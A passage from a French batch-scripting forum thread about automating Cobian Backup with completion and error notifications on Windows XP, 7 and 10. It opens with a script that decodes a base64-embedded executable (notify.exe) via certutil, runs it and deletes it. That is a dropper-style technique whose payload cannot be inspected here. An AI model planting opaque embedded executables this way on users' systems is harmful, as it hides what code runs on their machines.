ICDg4GIAEBEYCFBQAAEoCNBiABARKAjQQAAQgOBSABARJFBSACAQgIBiABARGAoQQgAQENBiABARGApQUgAgEcGAYgAQESgKkDAAABBAABAQIFAAEBEkEEBwESZQgAARKAsRGAtQUgABKAuQcgAgEOEoC5CAABEoC9EoC9CLd6XFYZNOCJCLA/X38R1Qo6AwYSRQMGEkkDBhJlAwYSaQMGEhQGIAIBHBJRBQABAR0OBAAAEmUEAAASaQUAAQESaQQAABIUBAgAEmUECAASaQQIABIUCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAsBAAZub3RpZnkAAAUBAAAAACEBABxDb3B5cmlnaHQgwqkgRmxhbW1yb2NrICAyMDE2AAApAQAkYTEzODEyMWEtNTI3OC00Y2MxLTgxZjctZTkxZWQ0NmM2NWMzAAAMAQAHMS4wLjAuMAAATQEAHC5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lFC5ORVQgRnJhbWV3b3JrIDQuNS4yBAEAAABAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAFkBAEtNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLkVkaXRvcnMuU2V0dGluZ3NEZXNpZ25lci5TZXR0aW5nc1NpbmdsZUZpbGVHZW5lcmF0b3IIMTQuMC4wLjAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAADV5fhXAAAAAAIAAAAcAQAA+DMAAPgVAABSU0RTwlPkYyg2Kk6C9a/stomGyAEAAABjOlx1c2Vyc1xmbGFtbXJvY2tcZG9jdW1lbnRzXHZpc3VhbCBzdHVkaW8gMjAxNVxQcm9qZWN0c1xub3RpZnlcbm90aWZ5XG9ialxEZWJ1Z1xub3RpZnkucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw1AAAAAAAAAAAAAFY1AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABINQAAAAAAAAAAAAAAAF9Db3JFeGVNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
echo;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
)> out.file
(certutil -f -decode "out.file" "notify.exe")>NUL
Del out.file>NUL
notify %1 %2 %3 %4 %5 %6
taskkill /f /im notify.exe
del /q notify.exe
attrib +h "notify.exe
ping localhost -n 2 >nul
exit

voila ! il fonctionne chez moi , windows 10 64Bits !
tu m'en diras des nouvelles , en cas d'erreur il supprime les fichiers contenant l'erreur et relance corbian jusqu'a ce qu'il n'y ai plus d'erreur !
slt

Salut!!

Quel travail !! Shocked

Du coup je viens seulement de tester, et donc je crois que le problème n'est pas totalement résolu.

Pour tester j'ai le fichier bat (j'ai copier coller le second code) sans le modifier, mais ça ne fonctionne pas je rencontre des erreurs durant le processus.
Il ya peut-être quelque chose à faire que je ne fais pas ou mal...

J'ai forcé l'erreur de sauvegarde en ne branchant pas la clé USB et du coup ça affiche quand même sauvegarde terminée..

J'ai fais un record vidéo je suis en train de l'upload sur youtube. (j'édite ce message quand c'est terminé) Dispo!

PS: La notification ne fonctionne que sur 10.

Merci encore de prendre le temps de m'aider.

Répondre en citant
Slt , le 2eme code c'était juste pour te montrer , c'est le premier qui est à prendre , sinon
Quel est le problème ?
Utilise seulement le premier et
redis moi ! Slt Okay

Re,

J'ai utilisé le premier code cette fois-ci et donc la sauvegarde se fait bien si ma clé USB est branchée.

Par contre lorsque la clé USB (soit le dossier de destination) n'est pas branchée la notification apparait avant même qu la sauvegarde soit faite avec le message "Tâche terminée sans erreur".

Pour revenir sur la notification je pense qu'elle va poser des problèmes car ce batch va me servir sur plusieurs postes avec différents systèmes (XP ; 7 ; 10).

En provoquant l'erreur, le log l'indique bien l'erreur mais l'automatisation (par le .bat) ne l'indique pas, et il ne faudrait pas que Cobian redémarre jusqu'à ce que la sauvegarde se fasse.
Il faudrait seulement que l'utilisateur soit averti de l'erreur,  sinon le processus risque de faire une boucle sans fin si l'erreur n'est pas résolue.

J'upload le record et j'édite dès qu'il est dispo.

https://youtu.be/4whQFcOqDBM

Répondre en citant
Ok précisé moi ce que tu veux que je change et je ferais de mon mieux pour régler ce problème !

Alors pour moi les points essentiels :

- Avertissement en cas d'échec (le mieux je pense en ciblant le mot impossible dans le fichier log) soit par un simple message dans la fenêtre CMD ou popup dans Windows et surtout compatibilité multi systèmes - XP / 7 / 10 (Excuse moi je ne l'avais pas notifié dans ma demande initiale)

- En cas d'erreur un redémarrage manuel suffit, en relançant le fichier bat après correction (exemple: vérification du branchement du support de sauvegarde).

- Toujours en cas d'erreur l'ouverture du log serait un plus (exemple : échec de sauvegarde = ouverture du log immédiate)

- (Bonus avec aucune obligation, proposer éjection du lecteur externe (G: par exemple) par 1 pour Oui et 2 pour Non )

Dans l'ordre le bat doit fonctionner comme ça :

1 - Lancement de la sauvegarde
2 - Sauvegarde effectuée sans erreur(s)
3 - Message de confirmation de sauvegarde terminée
4 - Commande "Pause" => Appuyez sur une touche pour continuer
++Bonus
5 - Éjection du support externe par lettre prédéfinie (Choix 1 ou 2)

OU EN CAS D'ERREUR(S)

1 - Lancement de la sauvegarde
2 - Sauvegarde avec erreur(s)
3 - Message d'information d'erreur de sauvegarde
4 - 4 - Commande "Pause" => Appuyez sur une touche pour continuer

N'hésites pas à me demander si tu souhaites plus de précisions Mr. Green

Merci

Répondre en citant
Merci , tu aurais dû commencé par ça XD , je m'y met quand je peux ( bientôt tqt)
Mais j'aurais juste besoin de savoir si le système de notification ne fonctionne vraiment pas ou si tu ne l'a juste pas testé ,
++ Mr. Green

Répondre au sujet Page 1 sur 1

Index | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Copyright 2008 - 2016 // Batch